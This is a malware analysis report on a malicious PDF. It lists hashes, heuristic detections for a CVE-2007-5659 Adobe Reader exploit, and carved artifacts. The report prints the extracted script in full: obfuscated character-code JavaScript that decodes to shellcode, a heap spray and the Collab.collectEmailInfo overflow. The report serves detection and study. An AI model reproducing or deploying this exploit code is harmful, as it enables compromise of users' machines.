Malicious PDF — malware analysis report

Static analysis result for SHA-256 5c7edd36b131f3cf…

MALICIOUS

PDF

750.2 KB Created: 2008-07-17 23:28:44 +08:00 Authoring application: Acrobat PDFMaker 7.0 for Word (via Acrobat Distiller 7.0 (Windows)) First seen: 2026-05-10
MD5: 71f8ec14981d7ade3fa787ad85fd60c9 SHA-1: 5cc994c4d7e5a42272496520472da2ff9e5eb19c SHA-256: 5c7edd36b131f3cf6d48ab966b96d0bf9a49e292a362f503774de1f370790c8a
348 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution

The PDF sample contains heavily obfuscated JavaScript that utilizes `eval()` and `String.fromCharCode` to construct and execute code. Heuristics indicate this code performs a heap spray and exploits CVE-2007-5659 via the `Collab.collectEmailInfo` API. The embedded JavaScript is multi-stage and likely downloads and executes a secondary payload, though the full chain could not be recovered due to obfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9972

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after nested-decoder de-obfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    eval(cc);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Secondary embedded PDF body has suspicious static findings critical POLYGLOT_CHILD_PDF_STATIC_TRIAGE
    A valid PDF body was found at a nonzero offset inside another container and its carved contents matched PDF exploit or lure heuristics. This catches polyglots where the top-level magic routes to ZIP/OLE while a PDF reader or downstream parser opens the hidden PDF payload.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/pdfx/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/photoshop/1.0/In PDF document text

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
3.jpg pdf-embedded-file PDF EmbeddedFile object 31 at offset 0x2303 403 bytes
SHA-256: 5d6527b148e8d84a27a4f669d817a52d39abe9bec61e35a052c66d495101c827
javascript_obj0037_000.js pdf-javascript-stream PDF /JS object 37 at offset 0xBA204 3433 bytes
SHA-256: 98e3c3ca0476ffedc3c2fffc3d2bff11646ce68d12d65706966657d0d9c107a5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sss =Array(102,117,110,99,116,105,111,110,32,114,101,40,99,111,117,110,116,64,119,104,97,116,41,123,118,97,114,32,118,32,61,32,34,34,59,119,104,105,108,101,32,40,45,45,99,111,117,110,116,32,62,61,32,48,41,118,32,43,61,32,119,104,97,116,59,114,101,116,117,114,110,32,118,59,125,102,117,110,99,116,105,111,110,32,115,116,97,114,116,40,41,123,115,99,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,37,117,57,48,57,48,37,117,57,48,57,48,37,117,57,48,57,48,37,117,68,52,56,66,37,117,67,65,56,48,37,117,52,50,70,70,37,117,52,51,54,65,37,117,53,50,53,56,37,117,50,69,67,68,37,117,51,67,53,65,37,117,55,52,48,53,37,117,52,50,70,49,37,117,70,65,56,48,37,117,55,55,70,67,37,117,66,56,69,66,37,117,65,67,66,70,37,117,65,55,66,54,37,117,48,50,48,51,37,117,70,49,55,53,37,117,69,50,70,70,34,41,59,105,102,40,97,112,112,46,118,105,101,119,101,114,86,101,114,115,105,111,110,32,62,61,32,55,46,48,41,123,112,108,105,110,32,61,32,114,101,40,49,49,50,52,64,117,110,101,115,99,97,112,101,40,34,37,117,48,98,48,98,37,117,48,48,50,56,37,117,48,54,101,98,37,117,48,54,101,98,34,41,41,32,43,32,117,110,101,115,99,97,112,101,40,34,37,117,48,98,48,98,37,117,48,48,50,56,37,117,48,97,101,98,37,117,48,97,101,98,34,41,32,43,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,34,41,32,43,32,114,101,40,49,50,50,64,117,110,101,115,99,97,112,101,40,34,37,117,48,98,48,98,37,117,48,48,50,56,37,117,48,54,101,98,37,117,48,54,101,98,34,41,41,32,43,32,115,99,32,43,32,114,101,40,49,50,53,54,64,117,110,101,115,99,97,112,101,40,34,37,117,52,49,52,49,37,117,52,49,52,49,34,41,41,59,125,101,108,115,101,123,101,102,54,32,61,32,32,117,110,101,115,99,97,112,101,40,34,37,117,102,54,101,98,37,117,102,54,101,98,34,41,32,43,32,117,110,101,115,99,97,112,101,40,34,37,117,48,98,48,98,37,117,48,48,49,57,34,41,59,112,108,105,110,32,61,32,114,101,40,56,48,64,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,34,41,41,32,43,32,115,99,32,43,32,114,101,40,56,48,64,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,34,41,41,43,32,117,110,101,115,99,97,112,101,40,34,37,117,101,55,101,57,37,117,102,102,102,57,34,41,43,117,110,101,115,99,97,112,101,40,34,37,117,102,102,102,102,37,117,102,102,102,102,34,41,32,43,32,117,110,101,115,99,97,112,101,40,34,37,117,102,54,101,98,37,117,102,52,101,98,34,41,32,43,32,117,110,101,115,99,97,112,101,40,34,37,117,102,50,101,98,37,117,102,49,101,98,34,41,59,119,104,105,108,101,32,40,40,112,108,105,110,46,108,101,110,103,116,104,32,37,32,56,41,32,33,61,32,48,41,112,108,105,110,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,49,52,49,34,41,32,43,32,112,108,105,110,59,112,108,105,110,32,43,61,32,114,101,40,50,54,50,54,64,101,102,54,41,59,125,105,102,32,40,97,112,112,46,118,105,101,119,101,114,86,101,114,115,105,111,110,32,62,61,32,54,46,48,41,123,116,104,105,115,46,99,111,108,108,97,98,83,116,111,114,101,32,61,32,67,111,108,108,97,98,46,99,111,108,108,101,99,116,69,109,97,105,108,73,110,102,111,40,123,115,117,98,106,58,32,34,34,64,109,115,103,58,32,112,108,105,110,125,41,59,125,125,118,97,114,32,115,104,97,102,116,32,61,32,97,112,112,46,115,101,116,84,105,109,101,79,117,116,40,34,115,116,97,114,116,40,41,34,64,49,50,48,48,41,59);
var arr =new Array();
for(var i=0;i<sss.length;i++)
{ 
arr[i]=String.fromCharCode(sss[i]); 
} 
var cc = arr.toString().replace(/,/g,"");
cc = cc.replace(/@/g,",")
 
eval(cc);
font_00_sfnt_off000330f4.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x330F4 341296 bytes
SHA-256: 2799947f4e001e38825bf5ee08cc007eda7b41ee058bcd2f642e771c0ea2aef7
polyglot_child_pdf_off00030ed0.pdf polyglot-child-pdf Secondary PDF body inside pdf container at offset 0x30ED0 567761 bytes
SHA-256: 7261617645f4447dcd9dcdb452342e0813e39ab371a40229a14d53033fe93aae